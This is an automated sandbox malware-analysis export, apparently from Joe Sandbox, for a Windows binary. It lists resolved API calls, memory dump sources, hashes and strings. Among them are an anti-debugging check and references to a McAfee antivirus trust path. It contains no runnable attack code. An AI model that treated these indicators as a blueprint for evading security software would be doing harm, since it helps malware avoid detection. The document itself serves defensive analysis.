                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0042557E
                                • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0042558F
                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 004255A0
                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 004255B1
                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 004255C2
                                • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 004255D3
                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 004255E4
                                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 004255F5
                                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00425606
                                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00425617
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                • API String ID: 667068680-295688737
                                • Opcode ID: 28bfbc9b6a4cedb49fd50eb8351245f9ce73a73b93f2b1927d936d966b5200fc
                                • Instruction ID: 1dfe0bd053739ca99ca312b497f2b597a75c313698eded26786c7510fa7ceb07
                                • Opcode Fuzzy Hash: 28bfbc9b6a4cedb49fd50eb8351245f9ce73a73b93f2b1927d936d966b5200fc
                                • Instruction Fuzzy Hash: ED61C079992310ABDB505FB4FC1EACD3AA8AA5B7423200977FA09D2171E7FC40948F5D
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00402D83
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402DC6
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402E07
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402E48
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402E89
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402ECA
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402F0B
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402F4C
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402F8D
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402FCE
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040300F
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403050
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403091
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004030D2
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403113
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403154
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403195
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004031D6
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040321A
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040325B
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040329C
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004032DD
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040331E
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040335F
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004033A0
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004033E1
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403422
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403463
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004034A7
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004034EB
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040352F
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403573
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004035B7
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004035FB
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040363F
                                • GetLastError.KERNEL32 ref: 0040368C
                                • GetLastError.KERNEL32 ref: 004036AE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$ErrorLast
                                • String ID:
                                • API String ID: 4214558900-0
                                • Opcode ID: 20e8b34668082c719bc70f61db2c35c8b582ebd7c62143e9f613d95d35a7b433
                                • Instruction ID: dd37ce1d7c22ac3c391c88d5f81df145b5bee8f538b7f835765fb104caeefadc
                                • Opcode Fuzzy Hash: 20e8b34668082c719bc70f61db2c35c8b582ebd7c62143e9f613d95d35a7b433
                                • Instruction Fuzzy Hash: 45B23574E04249AFDB05CFA8C4587AEBFF1AF89305F2480B9D815EB391DB799A40CB45
                                APIs
                                • GetProcAddress.KERNEL32(00000000), ref: 0040889D
                                • GetProcAddress.KERNEL32(00000000), ref: 004088E1
                                • GetProcAddress.KERNEL32(00000000), ref: 00408925
                                • GetProcAddress.KERNEL32(00000000), ref: 00408969
                                • GetProcAddress.KERNEL32(00000000), ref: 004089AD
                                • GetProcAddress.KERNEL32(00000000), ref: 004089F1
                                • GetProcAddress.KERNEL32(00000000), ref: 00408A35
                                • GetProcAddress.KERNEL32(00000000), ref: 00408A79
                                • GetProcAddress.KERNEL32(00000000), ref: 00408ABD
                                • GetProcAddress.KERNEL32(00000000), ref: 00408B01
                                • GetProcAddress.KERNEL32(00000000), ref: 00408B45
                                • GetProcAddress.KERNEL32(00000000), ref: 00408B89
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00408869), ref: 00408BD8
                                • GetLastError.KERNEL32 ref: 00408BFC
                                • GetLastError.KERNEL32 ref: 00408C20
                                • GetLastError.KERNEL32 ref: 00408D40
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$ErrorLast
                                • String ID:
                                • API String ID: 4214558900-0
                                • Opcode ID: 1adffce1487e78720c765d71a8c581d577efc13abd2b886eede52aacb4c8d431
                                • Instruction ID: c8883a0721b3cc25db747a9587e6ca382898a03ed3db371592895f5c7f91c0d5
                                • Opcode Fuzzy Hash: 1adffce1487e78720c765d71a8c581d577efc13abd2b886eede52aacb4c8d431
                                • Instruction Fuzzy Hash: 5BF18F70E042499FDB05CBA8C9587AEBFF0AF45304F1480BED855E7391DFB98A449B4A
                                APIs
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403BDA
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403C1D
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403C5E
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403C9F
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403CE0
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403D21
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403D62
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403DA3
                                • GetLastError.KERNEL32 ref: 00403DF0
                                • GetLastError.KERNEL32 ref: 00403E12
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$ErrorLast
                                • String ID:
                                • API String ID: 4214558900-0
                                • Opcode ID: 0be5edf2164177abd05aded27aead2eb1616ead2f83080db426ed3bcc5922c63
                                • Instruction ID: 8d46bfac799fa5dd1136b00e3de5451d4e1225cddf1ac0e51e89de3b4dacaf61
                                • Opcode Fuzzy Hash: 0be5edf2164177abd05aded27aead2eb1616ead2f83080db426ed3bcc5922c63
                                • Instruction Fuzzy Hash: 7FC14674E04249AFDB04CFA8C8587AEBFF1AF89305F1480BAD815E7381DB799A44CB55
                                APIs
                                  • Part of subcall function 00425D49: RtlEnterCriticalSection.NTDLL(00464694), ref: 00425D54
                                  • Part of subcall function 00425D49: RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425D91
                                • NtQuerySystemInformation.NTDLL ref: 0040CC39
                                • SysAllocStringLen.OLEAUT32(av.cache.set,0000000C), ref: 0040D0ED
                                • GetCurrentProcessId.KERNEL32 ref: 0040D100
                                • GetLastError.KERNEL32 ref: 0040D135
                                • NtQueryInformationProcess.NTDLL ref: 0040D197
                                • CloseHandle.KERNEL32(?), ref: 0040D1D0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CriticalInformationProcessQuerySection$AllocCloseCurrentEnterErrorHandleLastLeaveStringSystem
                                • String ID: C:\ProgramData$McAfee\WPS\content\av-trust$av.cache.set$gfff$`F$`F$`F
                                • API String ID: 3417838304-1905723352
                                • Opcode ID: e369764306d7ec5fcce8cb91f22b9e0fe9f0b5e0e7d819f7a3608364a3440ffe
                                • Instruction ID: 557801c9ed5a1b5dfbe99d658821c1afb5e5069ab4332f6818c706913a837c1b
                                • Opcode Fuzzy Hash: e369764306d7ec5fcce8cb91f22b9e0fe9f0b5e0e7d819f7a3608364a3440ffe
                                • Instruction Fuzzy Hash: 6022D570E00259CBEB14CF64DD45B9DBBB1AF45304F1082AED409AB3D1DBB95A88CF5A
                                APIs
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                • SysAllocStringLen.OLEAUT32(00000000,?), ref: 003EA7D4
                                • GetCurrentThreadId.KERNEL32 ref: 003EA8B2
                                • SysFreeString.OLEAUT32(?), ref: 003EA8F1
                                • SysFreeString.OLEAUT32(?), ref: 003EA8FE
                                • SysFreeString.OLEAUT32(?), ref: 003EA90B
                                • SysAllocStringLen.OLEAUT32(00000000,?), ref: 003EAB12
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 003E7C00: SysAllocStringLen.OLEAUT32(00000000,00000014), ref: 003E7C16
                                • GetCurrentThreadId.KERNEL32 ref: 003EABD9
                                • SysFreeString.OLEAUT32(?), ref: 003EAC18
                                • SysFreeString.OLEAUT32(?), ref: 003EAC25
                                • SysFreeString.OLEAUT32(?), ref: 003EAC32
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$Alloc$CurrentThread$InterruptMtx_init_in_situPreciseQueryTimeUnbiased
                                • String ID: dummy$publish$set setting
                                • API String ID: 2464836827-992586687
                                • Opcode ID: cb84abc3007cf75167627df21fe3a557215f32e0addce101a58d224d4a3c15af
                                • Instruction ID: 4c31ebbe5164b97b9aded68bd8efabc163093345bd8e531f3ed4a7f831b1374c
                                • Opcode Fuzzy Hash: cb84abc3007cf75167627df21fe3a557215f32e0addce101a58d224d4a3c15af
                                • Instruction Fuzzy Hash: 4BF14B74E002689FDB11DFA9D945B9EBBF4BF48300F1042AAE809AB381DB74AD44CF51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                • Opcode ID: 1c06e3e76cfb86a2d3bf3c2f51d39fee2ae069990c49878135c4ee9f301804de
                                • Instruction ID: 6a3e3af5a8343fc181485e235d63693ca0ad382d1900c06edb468acef706dde2
                                • Opcode Fuzzy Hash: 1c06e3e76cfb86a2d3bf3c2f51d39fee2ae069990c49878135c4ee9f301804de
                                • Instruction Fuzzy Hash: E5D24671E086299FDB25CE28DD407EAB7B5EB48305F1551EBD80DE3240EB38AE818F45
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 003E418A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003E4191
                                • GetProcessHeap.KERNEL32(00000000), ref: 003E41A9
                                • GetProcessHeap.KERNEL32 ref: 003E41BA
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E41C4
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Heap$Process$AllocateFree
                                • String ID:
                                • API String ID: 576844849-0
                                • Opcode ID: 54f41ab77575d6a7d7e9ab1daafb62973049ae85692751143112babd5837e769
                                • Instruction ID: 98ea42b23bc606e2e7eb72582532de06d2e8e214526c32993522cf57841c8abf
                                • Opcode Fuzzy Hash: 54f41ab77575d6a7d7e9ab1daafb62973049ae85692751143112babd5837e769
                                • Instruction Fuzzy Hash: 4371B174A00656EFCF16CF26D840BA9BBB5FF49304F158268E9099B781D331ED55CB90
                                APIs
                                • FindClose.KERNEL32(000000FF,?,00424DD5,0044D0B8,?,?,?,00404EBB,?,?,?,00000000,0044D0B8,00000001,A05DD77D), ref: 00424DB2
                                • FindFirstFileExW.KERNEL32(000000FF,00000001,A05DD77D,00000000,00000000,00000000,0044D0B8,?,0044D0B8,?,?,00424DD5,0044D0B8,?,?), ref: 00424DE2
                                • GetLastError.KERNEL32(?,?,00424DD5,0044D0B8,?,?,?,00404EBB,?,?,?,00000000,0044D0B8,00000001,A05DD77D), ref: 00424DEF
                                • FindFirstFileExW.KERNEL32(000000FF,00000000,A05DD77D,00000000,00000000,00000000,?,?,00424DD5,0044D0B8,?,?,?,00404EBB,?,?), ref: 00424E09
                                • GetLastError.KERNEL32(?,?,00424DD5,0044D0B8,?,?,?,00404EBB,?,?,?,00000000,0044D0B8,00000001,A05DD77D), ref: 00424E16
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Find$ErrorFileFirstLast$Close
                                • String ID:
                                • API String ID: 569926201-0
                                • Opcode ID: dc96b7a948804a6033a1f317271107757ea0bbc7c7394316982955a5bc7d8fda
                                • Instruction ID: 70354fddefb58ddecc33389a410f9501c96ddc104be17cafe4f3d42f4e8324ee
                                • Opcode Fuzzy Hash: dc96b7a948804a6033a1f317271107757ea0bbc7c7394316982955a5bc7d8fda
                                • Instruction Fuzzy Hash: A7019E35210164BBCB202FB6FC0CD5B3F79FFC2B20B50462AFA65851E0CB718861DA68
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: tdC$tdC
                                • API String ID: 0-2609971967
                                • Opcode ID: 3c6720fed5e96a56802081afed2282991f16dd102909b62614c51dfe3dbb8ed7
                                • Instruction ID: 8baf5df189be52ffa19095fe4dddbf4b3d7016435fb02c062bf73e905c229ca4
                                • Opcode Fuzzy Hash: 3c6720fed5e96a56802081afed2282991f16dd102909b62614c51dfe3dbb8ed7
                                • Instruction Fuzzy Hash: 3EF15071E006199FDF14CFA9D880AAEF7B1FF88314F15926AE815A7380D735AD01CB94
                                APIs
                                • GetLastError.KERNEL32 ref: 0041C012
                                • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,?,A05DD77D,00000000,?), ref: 0041C028
                                • LocalFree.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,?,A05DD77D,00000000,?), ref: 0041C17E
                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,?,A05DD77D,00000000,?), ref: 0041C1D9
                                • Concurrency::cancel_current_task.LIBCPMT ref: 0041C204
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLastLocal$AllocConcurrency::cancel_current_taskFree
                                • String ID:
                                • API String ID: 926668463-0
                                • Opcode ID: 208a84c88c0f1730c638b45db1c17205a98904e9599fb2dacbb9fc88db93ab42
                                • Instruction ID: 962ba9e09d122791b40066764bfe7f98a7bbc60f6bc9c1e17e29aa9486b17a4d
                                • Opcode Fuzzy Hash: 208a84c88c0f1730c638b45db1c17205a98904e9599fb2dacbb9fc88db93ab42
                                • Instruction Fuzzy Hash: 35328CB1E002198FDB14CF68C9947EEFBB1BF49304F14816AD459A7381D738AA85CF99
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: _strrchr
                                • String ID:
                                • API String ID: 3213747228-0
                                • Opcode ID: 519a4bbb09685210bb18ff8d162f577835aa1f0a1d3ca9cd9c92e5198af6fdba
                                • Instruction ID: 6208f264bd96c960831a51a71cccac832441a3deddb1749bf7e63b3e2cb42d69
                                • Opcode Fuzzy Hash: 519a4bbb09685210bb18ff8d162f577835aa1f0a1d3ca9cd9c92e5198af6fdba
                                • Instruction Fuzzy Hash: 3BB135329002559FDB15CF28C8A1BEEBBA5EF5D314F14926BE815AB341D23CDD01CBA9
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042660E
                                • IsDebuggerPresent.KERNEL32 ref: 004266DA
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004266FA
